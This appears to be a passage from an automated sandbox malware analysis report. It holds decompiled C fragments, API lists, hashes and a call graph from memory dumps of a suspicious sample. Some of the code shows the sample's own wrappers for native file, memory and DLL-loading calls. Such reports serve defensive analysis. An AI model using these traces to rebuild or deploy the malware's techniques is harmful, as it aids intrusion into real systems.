                        									__eflags =  *_t31;
                        								}
                        								return _t59;
                        							}
                        							L20:
                        							_t44 = E00D71CC3();
                        							_t59 = _t59 | 0xffffffff;
                        							__eflags = _t59;
                        							 *_t44 = 0x2a;
                        							goto L21;
                        						}
                        						_t59 = _v20;
                        						__eflags =  *(_t59 + 0x74) - 1;
                        						if( *(_t59 + 0x74) <= 1) {
                        							L15:
                        							_t20 = _t59 + 0x74; // 0xe1c11fe1
                        							__eflags = _t50 -  *_t20;
                        							L16:
                        							if(__eflags < 0) {
                        								goto L20;
                        							}
                        							__eflags = _t62[1];
                        							if(_t62[1] == 0) {
                        								goto L20;
                        							}
                        							L18:
                        							_t22 = _t59 + 0x74; // 0xe1c11fe1
                        							_t59 =  *_t22;
                        							goto L21;
                        						}
                        						_t12 = _t59 + 0x74; // 0xe1c11fe1
                        						__eflags = _t50 -  *_t12;
                        						if(__eflags < 0) {
                        							goto L16;
                        						}
                        						__eflags = _a4;
                        						_t17 = _t59 + 0x74; // 0xe1c11fe1
                        						_t18 = _t59 + 4; // 0x840ffff8
                        						_t47 = MultiByteToWideChar( *_t18, 9, _t62,  *_t17, _a4, 0 | _a4 != 0x00000000);
                        						_t59 = _v20;
                        						__eflags = _t47;
                        						if(_t47 != 0) {
                        							goto L18;
                        						}
                        						goto L15;
                        					}
                        					_t55 = _a4;
                        					__eflags = _t55;
                        					if(_t55 != 0) {
                        						 *_t55 =  *_t62 & 0x000000ff;
                        					}
                        					_t59 = 1;
                        					goto L21;
                        				}
                        				_t49 = _a4;
                        				if(_t49 != 0) {
                        					 *_t49 = 0;
                        				}
                        				goto L5;
                        			}



















                        APIs
                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00D791FC
                        • __isleadbyte_l.LIBCMT ref: 00D7922A
                        • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,E1C11FE1,00BFBBEF,00000000), ref: 00D79258
                        • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,00BFBBEF,00000000), ref: 00D7928E
                        Memory Dump Source
                        • Source File: 00000001.00000002.258065371.0000000000D71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D70000, based on PE: true
                        • Associated: 00000001.00000002.258059755.0000000000D70000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.258082115.0000000000D7E000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.258092574.0000000000D83000.00000004.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.258098400.0000000000D87000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_d70000_aeokw.jbxd
                        Similarity
                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                        • String ID:
                        • API String ID: 3058430110-0
                        • Opcode ID: 0c3f846bcc58c6a5b5f26665c348b18239ab651bd32b205c01c55924032216ee
                        • Instruction ID: 06d969cad3772a35a448b74aee3fe3b575c2adef8066131253236172a2a1ea77
                        • Opcode Fuzzy Hash: 0c3f846bcc58c6a5b5f26665c348b18239ab651bd32b205c01c55924032216ee
                        • Instruction Fuzzy Hash: 4131CF32600246BFDB219E75CC58BAABBA5FF41310F598528E868971A1F731D860DBB4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00D7A94D(void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                        				intOrPtr _t25;
                        				void* _t26;
                        
                        				_t25 = _a16;
                        				if(_t25 == 0x65 || _t25 == 0x45) {
                        					_t26 = E00D7AE9E(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                        					goto L9;
                        				} else {
                        					_t34 = _t25 - 0x66;
                        					if(_t25 != 0x66) {
                        						__eflags = _t25 - 0x61;
                        						if(_t25 == 0x61) {
                        							L7:
                        							_t26 = E00D7A9D3(_a4, _a8, _a12, _a20, _a24, _a28);
                        						} else {
                        							__eflags = _t25 - 0x41;
                        							if(__eflags == 0) {
                        								goto L7;
                        							} else {
                        								_t26 = E00D7B119(__esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                        							}
                        						}
                        						L9:
                        						return _t26;
                        					} else {
                        						return E00D7B058(__esi, _t34, _a4, _a8, _a12, _a20, _a28);
                        					}
                        				}
                        			}






                        APIs
                        Memory Dump Source
                        • Source File: 00000001.00000002.258065371.0000000000D71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D70000, based on PE: true
                        • Associated: 00000001.00000002.258059755.0000000000D70000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.258082115.0000000000D7E000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.258092574.0000000000D83000.00000004.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.258098400.0000000000D87000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_d70000_aeokw.jbxd
                        Similarity
                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                        • String ID:
                        • API String ID: 3016257755-0
                        • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                        • Instruction ID: df75f856d7dfbd36c160b527e5f4905a5b81d0084c358f888a7a4154378a97b9
                        • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                        • Instruction Fuzzy Hash: DB014E3204024EFBCF125E98CC418EE3F22BB58354B9A8515FE1D58031E336C9B1AFA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 88%
                        			E00D75770(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                        				intOrPtr _v0;
                        				void* _v808;
                        				int _t9;
                        				intOrPtr _t14;
                        				signed int _t15;
                        				signed int _t17;
                        				signed int _t19;
                        				intOrPtr _t22;
                        				intOrPtr _t23;
                        				intOrPtr _t24;
                        				intOrPtr _t25;
                        				intOrPtr _t26;
                        				intOrPtr _t27;
                        				intOrPtr _t28;
                        				intOrPtr* _t30;
                        				intOrPtr* _t32;
                        				void* _t35;
                        
                        				_t28 = __esi;
                        				_t27 = __edi;
                        				_t26 = __edx;
                        				_t23 = __ecx;
                        				_t22 = __ebx;
                        				_t35 = _t23 -  *0xd83400; // 0xd4169297
                        				if(_t35 == 0) {
                        					asm("repe ret");
                        				}
                        				_t30 = _t32;
                        				_t9 = IsProcessorFeaturePresent(0x17);
                        				if(_t9 != 0) {
                        					_t23 = 2;
                        					asm("int 0x29");
                        				}
                        				 *0xd84e10 = _t9;
                        				 *0xd84e0c = _t23;
                        				 *0xd84e08 = _t26;
                        				 *0xd84e04 = _t22;
                        				 *0xd84e00 = _t28;
                        				 *0xd84dfc = _t27;
                        				 *0xd84e28 = ss;
                        				 *0xd84e1c = cs;
                        				 *0xd84df8 = ds;
                        				 *0xd84df4 = es;
                        				 *0xd84df0 = fs;
                        				 *0xd84dec = gs;
                        				asm("pushfd");
                        				_pop( *0xd84e20);
                        				 *0xd84e14 =  *_t30;
                        				 *0xd84e18 = _v0;
                        				 *0xd84e24 =  &_a4;
                        				 *0xd84d60 = 0x10001;
                        				_t14 =  *0xd84e18; // 0x0
                        				 *0xd84d1c = _t14;
                        				 *0xd84d10 = 0xc0000409;
                        				 *0xd84d14 = 1;
                        				 *0xd84d20 = 1;
                        				_t15 = 4;
                        				 *((intOrPtr*)(0xd84d24 + _t15 * 0)) = 2;
                        				_t17 = 4;
                        				_t24 =  *0xd83400; // 0xd4169297
                        				 *((intOrPtr*)(_t30 + _t17 * 0 - 8)) = _t24;
                        				_t19 = 4;
                        				_t25 =  *0xd83404; // 0x2be96d68
                        				 *((intOrPtr*)(_t30 + (_t19 << 0) - 8)) = _t25;
                        				return E00D77A95(_t19 << 0, 0xd814c4);
                        			}





















                        APIs
                        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D77ADD
                        • ___raise_securityfailure.LIBCMT ref: 00D77BC4
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.258065371.0000000000D71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D70000, based on PE: true
                        • Associated: 00000001.00000002.258059755.0000000000D70000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.258082115.0000000000D7E000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.258092574.0000000000D83000.00000004.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.258098400.0000000000D87000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_d70000_aeokw.jbxd
                        Similarity
                        • API ID: FeaturePresentProcessor___raise_securityfailure
                        • String ID: hm+
                        • API String ID: 3761405300-2299420318
                        • Opcode ID: 14d81bc0a12dcdff91eb8cf61112a0fc1171a9fc7176278a0bb2f844975fb062
                        • Instruction ID: 5115c36652394d228fd4630e33bcf750dfabab23ae248369d7c4adfe625c20ac
                        • Opcode Fuzzy Hash: 14d81bc0a12dcdff91eb8cf61112a0fc1171a9fc7176278a0bb2f844975fb062
                        • Instruction Fuzzy Hash: 8A211FB5560306DBE712DF18F942A007BE8FB08310F10842AF908CB3A1E3B05A818FB9
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Execution Graph

                        Execution Coverage:5.8%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:3.9%
                        Total number of Nodes:533
                        Total number of Limit Nodes:68
4153a7 23471->23473 23472 4153fa 23472->23334 23473->23472 23474 4153e2 23473->23474 23475 4153f5 23473->23475 23477 41bd80 2 API calls 23474->23477 23476 41bd80 2 API calls 23475->23476 23476->23472 23478 4153e7 23477->23478 23478->23334 23480 41ad44 23479->23480 23481 41abf0 LdrLoadDll 23479->23481 23582 41abf0 23480->23582 23481->23480 23483 41ad4d 23484 41abf0 LdrLoadDll 23483->23484 23485 41ad56 23484->23485 23486 41abf0 LdrLoadDll 23485->23486 23487 41ad5f 23486->23487 23488 41abf0 LdrLoadDll 23487->23488 23489 41ad68 23488->23489 23490 41abf0 LdrLoadDll 23489->23490 23491 41ad71 23490->23491 23492 41abf0 LdrLoadDll 23491->23492 23493 41ad7d 23492->23493 23494 41abf0 LdrLoadDll 23493->23494 23495 41ad86 23494->23495 23496 41abf0 LdrLoadDll 23495->23496 23497 41ad8f 23496->23497 23498 41abf0 LdrLoadDll 23497->23498 23499 41ad98 23498->23499 23500 41abf0 LdrLoadDll 23499->23500 23501 41ada1 23500->23501 23502 41abf0 LdrLoadDll 23501->23502 23503 41adaa 23502->23503 23504 41abf0 LdrLoadDll 23503->23504 23505 41adb6 23504->23505 23506 41abf0 LdrLoadDll 23505->23506 23507 41adbf 23506->23507 23508 41abf0 LdrLoadDll 23507->23508 23509 41adc8 23508->23509 23510 41abf0 LdrLoadDll 23509->23510 23511 41add1 23510->23511 23512 41abf0 LdrLoadDll 23511->23512 23513 41adda 23512->23513 23514 41abf0 LdrLoadDll 23513->23514 23515 41ade3 23514->23515 23516 41abf0 LdrLoadDll 23515->23516 23517 41adef 23516->23517 23518 41abf0 LdrLoadDll 23517->23518 23519 41adf8 23518->23519 23520 41abf0 LdrLoadDll 23519->23520 23521 41ae01 23520->23521 23522 41abf0 LdrLoadDll 23521->23522 23523 41ae0a 23522->23523 23524 41abf0 LdrLoadDll 23523->23524 23525 41ae13 23524->23525 23526 41abf0 LdrLoadDll 23525->23526 23527 41ae1c 23526->23527 23528 41abf0 LdrLoadDll 23527->23528 23529 41ae28 23528->23529 23530 41abf0 LdrLoadDll 23529->23530 23531 41ae31 23530->23531 23532 41abf0 LdrLoadDll 23531->23532 23533 41ae3a 23532->23533 23534 41abf0 LdrLoadDll 23533->23534 23535 41ae43 23534->23535 23536 
41abf0 LdrLoadDll 23535->23536 23537 41ae4c 23536->23537 23538 41abf0 LdrLoadDll 23537->23538 23539 41ae55 23538->23539 23540 41abf0 LdrLoadDll 23539->23540 23541 41ae61 23540->23541 23542 41abf0 LdrLoadDll 23541->23542 23543 41ae6a 23542->23543 23544 41abf0 LdrLoadDll 23543->23544 23545 41ae73 23544->23545 23546 41abf0 LdrLoadDll 23545->23546 23547 41ae7c 23546->23547 23548 41abf0 LdrLoadDll 23547->23548 23549 41ae85 23548->23549 23550 41abf0 LdrLoadDll 23549->23550 23551 41ae8e 23550->23551 23552 41abf0 LdrLoadDll 23551->23552 23553 41ae9a 23552->23553 23554 41abf0 LdrLoadDll 23553->23554 23555 41aea3 23554->23555 23556 41abf0 LdrLoadDll 23555->23556 23557 41aeac 23556->23557 23557->23338 23559 41af20 LdrLoadDll 23558->23559 23560 419e9c 23559->23560 23560->23259 23561->23336 23563 41a51c NtAllocateVirtualMemory 23562->23563 23564 41af20 LdrLoadDll 23562->23564 23563->23435 23564->23563 23566 41cf00 23565->23566 23567 41cf06 23565->23567 23566->23442 23568 41bf50 2 API calls 23567->23568 23569 41cf2c 23568->23569 23569->23442 23571 41cf90 23570->23571 23572 41cfed 23571->23572 23573 41bf50 2 API calls 23571->23573 23572->23450 23574 41cfca 23573->23574 23574->23572 23575 41bd80 2 API calls 23574->23575 23575->23572 23576->23446 23577->23460 23578->23462 23579->23465 23580->23467 23581->23439 23583 41ac0b 23582->23583 23584 414e40 LdrLoadDll 23583->23584 23585 41ac2b 23584->23585 23586 414e40 LdrLoadDll 23585->23586 23587 41acd7 23585->23587 23586->23587 23587->23483 23587->23587 23589 41a64c RtlFreeHeap 23588->23589 23590 41af20 LdrLoadDll 23588->23590 23589->23346 23590->23589 23592 407eb0 23591->23592 23593 407eab 23591->23593 23594 41bd00 2 API calls 23592->23594 23593->23267 23595 407ed5 23594->23595 23596 407f38 23595->23596 23597 419e80 LdrLoadDll 23595->23597 23598 407f3e 23595->23598 23602 41bd00 2 API calls 23595->23602 23607 41a580 23595->23607 23596->23267 23597->23595 23600 407f64 23598->23600 23601 41a580 LdrLoadDll 23598->23601 23600->23267 23603 
407f55 23601->23603 23602->23595 23603->23267 23605 41a580 LdrLoadDll 23604->23605 23606 40817e 23605->23606 23606->23224 23608 41af20 LdrLoadDll 23607->23608 23609 41a59c 23608->23609 23609->23595 23611 41b583 23610->23611 23614 40ace0 23611->23614 23613 409c4b 23613->23232 23616 40ad04 23614->23616 23615 40ad0b 23615->23613 23616->23615 23617 40ad40 LdrLoadDll 23616->23617 23618 40ad57 23616->23618 23617->23618 23618->23613 23621 40b053 23619->23621 23620 40b0d0 23620->23237 23621->23620 23633 419c50 LdrLoadDll 23621->23633 23624 41af20 LdrLoadDll 23623->23624 23625 40f1ab 23624->23625 23625->23244 23626 41a790 23625->23626 23627 41af20 LdrLoadDll 23626->23627 23628 41a7af LookupPrivilegeValueW 23627->23628 23628->23241 23631 41a23c 23630->23631 23632 41af20 LdrLoadDll 23630->23632 23631->23245 23632->23631 23633->23620 23635 40b1e0 23634->23635 23636 40b030 LdrLoadDll 23635->23636 23637 40b1f4 23636->23637 23637->23178 23639 40ae41 23638->23639 23640 40ae3d 23638->23640 23641 40ae8c 23639->23641 23642 40ae5a 23639->23642 23640->23181 23679 419c90 LdrLoadDll 23641->23679 23678 419c90 LdrLoadDll 23642->23678 23644 40ae9d 23644->23181 23646 40ae7c 23646->23181 23648 40f490 LdrLoadDll 23647->23648 23649 4143b6 23647->23649 23648->23649 23649->23183 23680 4087a0 23650->23680 23653 4087a0 8 API calls 23654 408a8a 23653->23654 23656 408a9d 23654->23656 23698 40f700 6 API calls 23654->23698 23656->23185 23658 41a4d6 23657->23658 23659 41af20 LdrLoadDll 23658->23659 23660 40c312 23659->23660 23661 40f490 23660->23661 23662 40f4ad 23661->23662 23808 419f80 23662->23808 23665 40f4f5 23665->23189 23666 419fd0 LdrLoadDll 23667 40f51e 23666->23667 23667->23189 23669 419fd6 23668->23669 23670 41af20 LdrLoadDll 23669->23670 23671 40c375 23670->23671 23671->23195 23671->23198 23673 41af20 LdrLoadDll 23672->23673 23674 40c449 23673->23674 23674->23206 23676 41af20 LdrLoadDll 23675->23676 23677 40c49c 23676->23677 23677->23210 23678->23646 23679->23644 23681 407ea0 2 API calls 
23680->23681 23693 4087ba 23680->23693 23681->23693 23682 408a49 23682->23653 23682->23656 23683 408a3f 23684 408160 LdrLoadDll 23683->23684 23684->23682 23687 419ec0 LdrLoadDll 23687->23693 23691 40c4b0 LdrLoadDll NtClose 23691->23693 23693->23682 23693->23683 23693->23687 23693->23691 23695 419de0 LdrLoadDll 23693->23695 23696 41a450 LdrLoadDll NtClose 23693->23696 23699 419cd0 23693->23699 23702 4085d0 23693->23702 23714 40f5e0 LdrLoadDll NtClose 23693->23714 23715 419d50 LdrLoadDll 23693->23715 23716 419d80 LdrLoadDll 23693->23716 23717 419e10 LdrLoadDll 23693->23717 23718 4083a0 23693->23718 23734 405f60 LdrLoadDll 23693->23734 23695->23693 23696->23693 23698->23656 23700 41af20 LdrLoadDll 23699->23700 23701 419cec 23700->23701 23701->23693 23703 4085e6 23702->23703 23735 419840 23703->23735 23705 4085ff 23710 408771 23705->23710 23756 4081a0 23705->23756 23707 4086e5 23708 4083a0 7 API calls 23707->23708 23707->23710 23709 408713 23708->23709 23709->23710 23711 419ec0 LdrLoadDll 23709->23711 23710->23693 23712 408748 23711->23712 23712->23710 23713 41a4c0 LdrLoadDll 23712->23713 23713->23710 23714->23693 23715->23693 23716->23693 23717->23693 23719 4083c9 23718->23719 23790 408310 23719->23790 23722 41a4c0 LdrLoadDll 23723 4083dc 23722->23723 23723->23722 23724 408467 23723->23724 23727 408462 23723->23727 23798 40f660 23723->23798 23724->23693 23725 41a450 2 API calls 23726 40849a 23725->23726 23726->23724 23728 419cd0 LdrLoadDll 23726->23728 23727->23725 23729 4084ff 23728->23729 23729->23724 23802 419d10 23729->23802 23731 408563 23731->23724 23732 414a40 6 API calls 23731->23732 23733 4085b8 23732->23733 23733->23693 23734->23693 23736 41bf50 2 API calls 23735->23736 23737 419857 23736->23737 23763 409310 23737->23763 23739 419872 23740 4198b0 23739->23740 23741 419899 23739->23741 23744 41bd00 2 API calls 23740->23744 23742 41bd80 2 API calls 23741->23742 23743 4198a6 23742->23743 23743->23705 23745 4198ea 23744->23745 23746 41bd00 2 API calls 
23745->23746 23747 419903 23746->23747 23753 419ba4 23747->23753 23769 41bd40 23747->23769 23750 419b90 23751 41bd80 2 API calls 23750->23751 23752 419b9a 23751->23752 23752->23705 23754 41bd80 2 API calls 23753->23754 23755 419bf9 23754->23755 23755->23705 23757 4081b5 23756->23757 23758 40829f 23756->23758 23757->23758 23759 414a40 6 API calls 23757->23759 23758->23707 23760 408222 23759->23760 23761 41bd80 2 API calls 23760->23761 23762 408249 23760->23762 23761->23762 23762->23707 23764 409335 23763->23764 23765 40ace0 LdrLoadDll 23764->23765 23766 409368 23765->23766 23768 40938d 23766->23768 23772 40cf10 23766->23772 23768->23739 23787 41a540 23769->23787 23773 40cf3c 23772->23773 23774 41a1a0 LdrLoadDll 23773->23774 23775 40cf55 23774->23775 23776 40cf5c 23775->23776 23783 41a1e0 23775->23783 23776->23768 23780 40cf97 23781 41a450 2 API calls 23780->23781 23782 40cfba 23781->23782 23782->23768 23784 41af20 LdrLoadDll 23783->23784 23785 40cf7f 23784->23785 23785->23776 23786 41a7d0 LdrLoadDll 23785->23786 23786->23780 23788 41af20 LdrLoadDll 23787->23788 23789 419b89 23788->23789 23789->23750 23789->23753 23791 408328 23790->23791 23792 40ace0 LdrLoadDll 23791->23792 23793 408343 23792->23793 23794 414e40 LdrLoadDll 23793->23794 23795 408353 23794->23795 23796 40835c PostThreadMessageW 23795->23796 23797 408370 23795->23797 23796->23797 23797->23723 23799 40f673 23798->23799 23805 419e50 23799->23805 23803 41af20 LdrLoadDll 23802->23803 23804 419d2c 23803->23804 23804->23731 23806 41af20 LdrLoadDll 23805->23806 23807 40f69e 23805->23807 23806->23807 23807->23723 23809 40f4ee 23808->23809 23810 41af20 LdrLoadDll 23808->23810 23809->23665 23809->23666 23810->23809

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 0 41a3ce-41a419 call 41af20 NtReadFile
                        C-Code - Quality: 23%
                        			E0041A3CE(void* __eax, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, char _a28, intOrPtr _a32, char _a36) {
                        				intOrPtr _v0;
                        				void* _t19;
                        				void* _t28;
                        				void* _t29;
                        				intOrPtr* _t30;
                        				void* _t32;
                        
                        				asm("aad 0x55");
                        				_t14 = _v0;
                        				_t30 = _v0 + 0xc48;
                        				E0041AF20(_t28, _t14, _t30,  *((intOrPtr*)(_t14 + 0x10)), 0, 0x2a);
                        				_t4 =  &_a36; // 0x414a21
                        				_t6 =  &_a28; // 0x414d62
                        				_t12 =  &_a4; // 0x414d62
                        				_t19 =  *((intOrPtr*)( *_t30))( *_t12, _a8, _a12, _a16, _a20, _a24,  *_t6, _a32,  *_t4, _t29, _t32, __eax); // executed
                        				return _t19;
                        			}










                        APIs
                        • NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A415
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_aeokw.jbxd
                        Yara matches
                        Similarity
                        • API ID: FileRead
                        • String ID: !JA$bMA$bMA
                        • API String ID: 2738559852-4222312340
                        • Opcode ID: fe205197a1c041c32c5dc87a2d977c2ecf48653b698c8e2162f2cada97e5132b
                        • Instruction ID: 2b59cacd985905e6d9ebe9db6352663ad52ddf4b88a6e3b9a0d282aa9568fefa
                        • Opcode Fuzzy Hash: fe205197a1c041c32c5dc87a2d977c2ecf48653b698c8e2162f2cada97e5132b
                        • Instruction Fuzzy Hash: 1FF0A4B2200108ABCB14DF89DC81EEB77ADAF8C754F158649BE1DA7251D634E9518BA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 3 41a3d0-41a3e6 4 41a3ec-41a419 NtReadFile 3->4 5 41a3e7 call 41af20 3->5 5->4
                        C-Code - Quality: 37%
                        			E0041A3D0(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
                        				void* _t18;
                        				void* _t27;
                        				intOrPtr* _t28;
                        
                        				_t13 = _a4;
                        				_t28 = _a4 + 0xc48;
                        				E0041AF20(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                        				_t4 =  &_a40; // 0x414a21
                        				_t6 =  &_a32; // 0x414d62
                        				_t12 =  &_a8; // 0x414d62
                        				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
                        				return _t18;
                        			}







                        APIs
                        • NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A415
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_aeokw.jbxd
                        Yara matches
                        Similarity
                        • API ID: FileRead
                        • String ID: !JA$bMA$bMA
                        • API String ID: 2738559852-4222312340
                        • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                        • Instruction ID: 54437c4e75339082d0912fbe7e6c9053912bd6928cda1a9760da43cab1c95c7d
                        • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                        • Instruction Fuzzy Hash: C3F0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241D630E8518BA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 249 40ace0-40ad09 call 41cc10 252 40ad0b-40ad0e 249->252 253 40ad0f-40ad1d call 41d030 249->253 256 40ad2d-40ad3e call 41b460 253->256 257 40ad1f-40ad2a call 41d2b0 253->257 262 40ad40-40ad54 LdrLoadDll 256->262 263 40ad57-40ad5a 256->263 257->256 262->263
                        C-Code - Quality: 100%
                        			E0040ACE0(void* _a4, intOrPtr _a8) {
                        				char* _v8;
                        				struct _EXCEPTION_RECORD _v12;
                        				struct _OBJDIR_INFORMATION _v16;
                        				char _v536;
                        				void* _t15;
                        				struct _OBJDIR_INFORMATION _t17;
                        				struct _OBJDIR_INFORMATION _t18;
                        				void* _t30;
                        				void* _t31;
                        				void* _t32;
                        
                        				_v8 =  &_v536;
                        				_t15 = E0041CC10( &_v12, 0x104, _a8);
                        				_t31 = _t30 + 0xc;
                        				if(_t15 != 0) {
                        					_t17 = E0041D030(__eflags, _v8);
                        					_t32 = _t31 + 4;
                        					__eflags = _t17;
                        					if(_t17 != 0) {
                        						E0041D2B0( &_v12, 0);
                        						_t32 = _t32 + 8;
                        					}
                        					_t18 = E0041B460(_v8);
                        					_v16 = _t18;
                        					__eflags = _t18;
                        					if(_t18 == 0) {
                        						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                        						return _v16;
                        					}
                        					return _t18;
                        				} else {
                        					return _t15;
                        				}
                        			}














                        APIs
                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD52
                        Memory Dump Source
                        • Source File: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_aeokw.jbxd
                        Yara matches
                        Similarity
                        • API ID: Load
                        • String ID:
                        • API String ID: 2234796835-0
                        • Opcode ID: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                        • Instruction ID: 93036d1b31c8ba6342ae8de3f2893f5930aff37f33252288d1eb8296453bc5b5
                        • Opcode Fuzzy Hash: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                        • Instruction Fuzzy Hash: FF015EB5E0020DABDB10EBA1DC42FDEB3789F14308F0041AAE908A7281F634EB54CB95
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 270 41a320-41a336 271 41a33c-41a371 NtCreateFile 270->271 272 41a337 call 41af20 270->272 272->271
                        C-Code - Quality: 100%
                        			E0041A320(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                        				long _t21;
                        				void* _t31;
                        
                        				_t3 = _a4 + 0xc40; // 0xc40
                        				E0041AF20(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                        				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                        				return _t21;
                        			}






                        APIs
                        • NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A36D
                        Memory Dump Source
                        • Source File: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_400000_aeokw.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateFile
                        • String ID:
                        • API String ID: 823142352-0
                        • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                        • Instruction ID: 30690d9e011530b668ed3b4ae7cc5c3fda29d367b226dbf4f68f65ca016a7565
                        • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                        • Instruction Fuzzy Hash: FDF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 273 41a31f-41a371 call 41af20 NtCreateFile
                        C-Code - Quality: 100%
                        			E0041A31F(void* __eax, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                        				long _t24;
                        				void* _t34;
                        
                        				_t18 = _a4;
                        				_t5 = _t18 + 0xc40; // 0xc40
                        				E0041AF20(_t34, _a4, _t5,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                        				_t24 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                        				return _t24;
                        			}






                        APIs
                        • NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A36D
                        Memory Dump Source
                        • Source File: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
